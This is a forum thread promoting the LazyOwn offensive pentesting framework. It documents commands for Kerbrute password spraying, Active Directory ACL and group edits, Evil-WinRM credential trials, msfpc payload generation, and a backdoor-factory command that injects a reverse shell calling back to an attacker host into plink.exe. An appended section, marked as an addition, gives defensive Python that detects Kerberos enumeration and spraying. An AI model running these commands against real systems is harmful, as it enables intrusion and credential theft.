The LazyOwn Framework is a comprehensive toolkit designed for professional penetration testers and red teams
Posted: 29 Aug 2024, 07:17
by grisun0
LazyOwn Framework is a powerful and versatile security framework designed to automate and streamline pentesting and vulnerability analysis tasks. This interactive environment combines multiple tools and scripts, making it easier for cybersecurity professionals to work through various stages of the security assessment lifecycle. With an intuitive command-line interface, LazyOwn allows users to configure specific parameters, execute custom scripts, and obtain real-time results, all from a single platform.

Key Features:

Interactive Interface:
- Interactive shell with user-friendly commands for configuring and running scripts.
- Ability to display and adjust custom parameters applicable to different scripts.

Task Automation:
- Automates common pentesting tasks such as vulnerability scanning, web application fuzzing, brute force attacks, and more.
- Integration with popular tools and custom scripts for comprehensive testing coverage on Parrot Sec.

Real-Time Visualization:
- Real-time output display of script execution, allowing users to see results instantly and react swiftly.

Modularity and Extensibility:
- Designed to be extensible, enabling users to easily add and customize scripts.
- Supports multiple scripting languages, including Python and Bash.

Flexible Configuration:
- Ability to set specific parameters like IP addresses, API keys, HTTP methods, request data, and more, providing complete control over executed scripts.

Typical Use:

Parameter Configuration:
- Users can set required parameters using commands like set rhost 192.168.1.1 to define the target IP address.

Script Execution:
- Execute predefined scripts for various tasks, such as run lazygptcli to interact with GPT using a configured prompt and API key.

Results Visualization:
- Script results are displayed in the console in real-time, providing immediate feedback on progress and findings.

Additional Modules:

LazyOwn includes various specialized modules such as:
- lazyownrat and lazyownratcli: For running remote access tools with configurable parameters.
- lazyftpsniff and lazysniff: For network sniffing on specified interfaces.
- lazysearch_bot and lazygptcli: For interacting with search APIs and GPT-based tools.
- lazyhoneypot: For setting up email-based honeypots.
- lazynetbios: For NetBIOS enumeration across IP ranges.
- lazywerkzeugdebug: For testing Werkzeug in debug mode.

Background:

Originally designed to automate the search and analysis of binaries with special permissions on Linux and Windows systems, LazyOwn has evolved to encompass a broader range of functionalities. The project includes scripts that extract information from GTFOBins, analyze binaries on the system, and generate options based on the collected data.

LazyOwn on Reddit
Revolutionize Your Pentesting with LazyOwn: Automate the intrusion on Linux, MAC OSX, and Windows VICTIMS
Posted: 05 Sep 2024, 07:11
by grisun0
Some commands automated by the app:
## sliver_server
Starts the Sliver server and generates a client configuration file for connecting clients.
Provides options to download the Sliver client for Windows, Linux, or macOS.
Usage:
sliver-server [flags]
sliver-client [command]
This function installs Sliver if it is not already installed, starts the Sliver server,
generates the necessary certificates, and creates a client configuration file.
It also provides options to download the client for different operating systems.
Parameters:
line (str): The command line input for the function (not used directly in the current implementation).
Returns:
None
Example:
To start the Sliver server, generate the necessary certificates, and download the client,
run this function. Choose the appropriate client download option based on the operating system.
## gencert
Generates a certificate authority (CA), client certificate, and client key.
Returns:
str: Paths to the generated CA certificate, client certificate, and client key.
## kerbrute
Executes the Kerbrute tool to enumerate user accounts against a specified target domain controller.
This function performs the following actions:
1. Retrieves necessary parameters such as the target URL and remote host (rhost).
2. Determines the domain based on the provided URL.
3. Validates the remote host address.
4. Constructs and executes the Kerbrute command to enumerate user accounts, saving the results in the sessions/users.txt file.
Parameters:
line (str): Specify 'pass' to use credentials from 'credentials.txt' for password spraying, 'brute' to brute force using 'users.txt' and the RockYou wordlist, or leave empty for default behavior.
Returns:
None
Example:
To enumerate user accounts using Kerbrute, ensure Kerbrute is in your path,
then run this function to perform the enumeration.
Note:
- The function assumes that the Kerbrute binary (kerbrute_linux_amd64) is present in the system's PATH.
- The file sessions/users.txt should exist and contain the list of usernames to enumerate.
## dacledit
Execute the dacledit.py command for a specific user or all users listed in the users.txt file.
This function interacts with the DACL editor to modify access control lists in an Active Directory environment.
It allows the user to select a specific user from the list or execute the command for all users.
Install the Impacket suite to get this script in the examples.
Args:
line (str): The organizational unit (OU) in the format 'OU=EXAMPLE,DC=DOMAIN,DC=EXT'. If not provided, the user is prompted to enter it.
Returns:
None
Workflow:
1. Extract parameters and set up paths.
2. Check the reachability of the remote host.
3. Prompt the user for an OU if not provided.
4. Check if the users.txt file exists and read the list of users.
5. Display the list of users and prompt the user to select a specific user.
6. Execute the dacledit.py command for the selected user or all users.
Raises:
FileNotFoundError: If the users.txt file does not exist.
Example:
To execute the command for a specific user:
>>> do_dacledit("MARKETING DIGITAL")
To execute the command for all users:
>>> do_dacledit("")
## bloodyAD
Execute the bloodyAD.py command for a specific user or all users listed in the users.txt file.
This function interacts with BloodyAD to add users to a group in an Active Directory environment.
It allows the user to select a specific user from the list or execute the command for all users.
(use download_external option 48 to clone the repo)
Args:
line (str): The organizational unit (OU) in the format 'CN=EXAMPLE,DC=DOMAIN,DC=EXT'.
If not provided, the user is prompted to enter it.
Returns:
None
Workflow:
1. Extract parameters and set up paths.
2. Check the reachability of the remote host.
3. Prompt the user for a CN if not provided.
4. Check if the users.txt file exists and read the list of users.
5. Display the list of users and prompt the user to select a specific user.
6. Execute the bloodyAD.py command for the selected user or all users.
Raises:
FileNotFoundError: If the users.txt file does not exist.
Example:
To execute the command for a specific user:
>>> do_bloodyAD("")
To execute the command for all users:
>>> do_bloodyAD("")
## evilwinrm
Executes the Evil-WinRM tool to attempt authentication against the specified target.
This function performs the following actions:
1. Checks if the provided target host (`rhost`) is valid.
2. If the `line` argument is "pass", it reads credentials from the `credentials.txt` file and attempts authentication for each user-password pair using Evil-WinRM.
3. If `line` is not "pass", it prints an error message indicating the correct usage.
Parameters:
line (str): A command argument to determine the action.
If "pass", the function reads credentials from the `credentials.txt` file and attempts to authenticate.
If not "pass", it prints an error message with usage instructions.
Returns:
None
## getTGT
Requests a Ticket Granting Ticket (TGT) using the Impacket tool with provided credentials.
This function performs the following actions:
1. Checks if the provided target host (`rhost`) is valid.
2. Reads credentials from the `credentials.txt` file.
3. Uses each credential (username and password) to request a TGT with the Impacket tool.
4. Constructs and executes the Impacket command to obtain a TGT for each set of credentials.
Parameters:
line (str): A command line argument, not used in this implementation.
Returns:
None
## apache_users
Performs enumeration of users from a target system using `apache-users`.
1. Executes the `apache-users` command with the `-h` option against the specified target.
:param line: This parameter is not used in the current implementation but could be used to pass additional options or arguments if needed.
:param rhost: The target host for enumeration, specified in the `params` dictionary.
:returns: None
Manual execution:
To manually enumerate information from a system, use the following command:
apache-users -h <target_host> -l <wordlist> -p <apache_port> -s 0 -e 403 -t 10
Replace `<target_host>` with the IP address or hostname of the target system.
For example:
apache-users -h 192.168.1.202 -l /usr/share/wordlists/metasploit/unix_users.txt -p 80 -s 0 -e 403 -t 10
## backdoor_factory
Creates a backdoored executable using `backdoor-factory`.
This function checks if `backdoor-factory` is installed, installs it if necessary, and then uses it to
inject a reverse shell payload into a specified binary file. The binary is backdoored with a
reverse shell payload that connects back to a specified host and port.
:param line: The absolute path to the file that will be backdoored. If not provided, the user is prompted
to enter the path.
:returns: None
Manual execution:
To manually create a backdoored executable, use the following command:
backdoor-factory -f <file_path> -H <lhost> -P <lport> -s reverse_shell_tcp_inline -J -a -c -l 128 -o <output_file>
Replace `<file_path>` with the path to the binary you want to backdoor, `<lhost>` with the IP address of
the attacker’s machine, and `<lport>` with the port number to listen on. The `<output_file>` is the path
where the backdoored binary will be saved.
For example:
backdoor-factory -f /usr/share/windows-binaries/plink.exe -H 192.168.1.202 -P 4444 -s reverse_shell_tcp_inline -J -a -c -l 128 -o sessions/backdoor_factory.exe
## davtest
Tests WebDAV server configurations using `davtest`.
This function checks if `davtest` is installed and installs it if necessary. It then runs `davtest`
to perform a WebDAV server test against a specified URL or the default URL configured in `self.params`.
:param line: The URL of the WebDAV server to test. If provided, it overrides the default URL.
If not provided, the function uses the URL specified in `self.params["rhost"]`.
:returns: None
Manual execution:
To manually test a WebDAV server, use the following command:
davtest --url <url>
Replace `<url>` with the URL of the WebDAV server you want to test.
For example:
davtest --url [Enlace externo eliminado para invitados]
## msfpc
Generates payloads using MSFvenom Payload Creator (MSFPC).
This function checks if `msfpc` is installed and installs it if necessary. It then runs `msfpc`
with the specified parameters to create a payload for penetration testing.
:param line: Not used in this implementation but reserved for future use.
:returns: None
Manual execution:
To manually generate a payload using MSFPC, use the following command:
msfpc <TYPE> <DOMAIN/IP> <PORT> <CMD/MSF> <BIND/REVERSE> <STAGED/STAGELESS> <TCP/HTTP/HTTPS/FIND_PORT> <BATCH/LOOP> <VERBOSE>
Replace the placeholders with the desired values. For example:
msfpc windows 192.168.1.10 4444 reverse stageless tcp verbose
Example usage:
msfpc windows 192.168.1.10 # Windows & manual IP.
msfpc elf bind eth0 4444 # Linux, eth0's IP & manual port.
msfpc stageless cmd py https # Python, stageless command prompt.
msfpc verbose loop eth1 # A payload for every type, using eth1's IP.
msfpc msf batch wan # All possible Meterpreter payloads, using WAN IP.
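
A defender-side view of the `kerbrute` command described earlier in this post, added here as an example that is not part of the original post or of LazyOwn: it flags sources whose Kerberos failures span many distinct accounts in a short window, which is how user enumeration and password spraying appear in domain controller logs. The record layout, addresses, account names and thresholds are constructed assumptions; the event IDs (4768, 4771) and result codes (0x6, 0x18) are the standard Windows values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Windows Security event IDs and Kerberos result codes (need Kerberos auditing on).
AS_REQ, PREAUTH_FAILED = 4768, 4771
PRINCIPAL_UNKNOWN, BAD_PASSWORD = "0x6", "0x18"

def parse(line):
    """Parse one 'time,event_id,client_ip,account,status' record (assumed layout)."""
    ts, eid, ip, account, status = line.strip().split(",")
    return datetime.fromisoformat(ts), int(eid), ip, account.lower(), status.lower()

def classify(eid, status):
    if eid == AS_REQ and status == PRINCIPAL_UNKNOWN:
        return "user-enumeration"   # AS-REQ for names that do not exist
    if eid == PREAUTH_FAILED and status == BAD_PASSWORD:
        return "password-spray"     # wrong password against real accounts
    return None

def detect(lines, window=timedelta(seconds=60), min_accounts=5):
    """Return {(client_ip, pattern): accounts} for each source that produced the
    same failure for at least min_accounts distinct accounts inside one window."""
    hits_by_source = defaultdict(list)
    for ts, eid, ip, account, status in sorted(map(parse, lines)):
        pattern = classify(eid, status)
        if pattern:
            hits_by_source[(ip, pattern)].append((ts, account))
    alerts = {}
    for key, hits in hits_by_source.items():
        start = 0
        for end, (ts, _) in enumerate(hits):
            while ts - hits[start][0] > window:      # slide the window forward
                start += 1
            accounts = {a for _, a in hits[start:end + 1]}
            if len(accounts) >= min_accounts:
                alerts[key] = sorted(accounts | set(alerts.get(key, [])))
    return alerts

# Constructed sample records: one enumerating host, one spraying host, and a
# user who mistypes a password three times before logging in.
SAMPLE = (
    [f"2024-09-05T07:11:{i:02d},4768,10.0.0.50,guess{i},0x6" for i in range(6)]
    + [f"2024-09-05T07:20:{i * 5:02d},4771,10.0.0.51,user{i},0x18" for i in range(5)]
    + ["2024-09-05T07:30:00,4771,10.0.0.20,jsmith,0x18"] * 3
    + ["2024-09-05T07:31:00,4768,10.0.0.20,jsmith,0x0"]
)

if __name__ == "__main__":
    for (ip, pattern), accounts in detect(SAMPLE).items():
        print(f"{ip}: {pattern} against {len(accounts)} accounts")
```

The single user with repeated bad passwords is not flagged because only one distinct account is involved; tune `window` and `min_accounts` to the environment's normal failure rate.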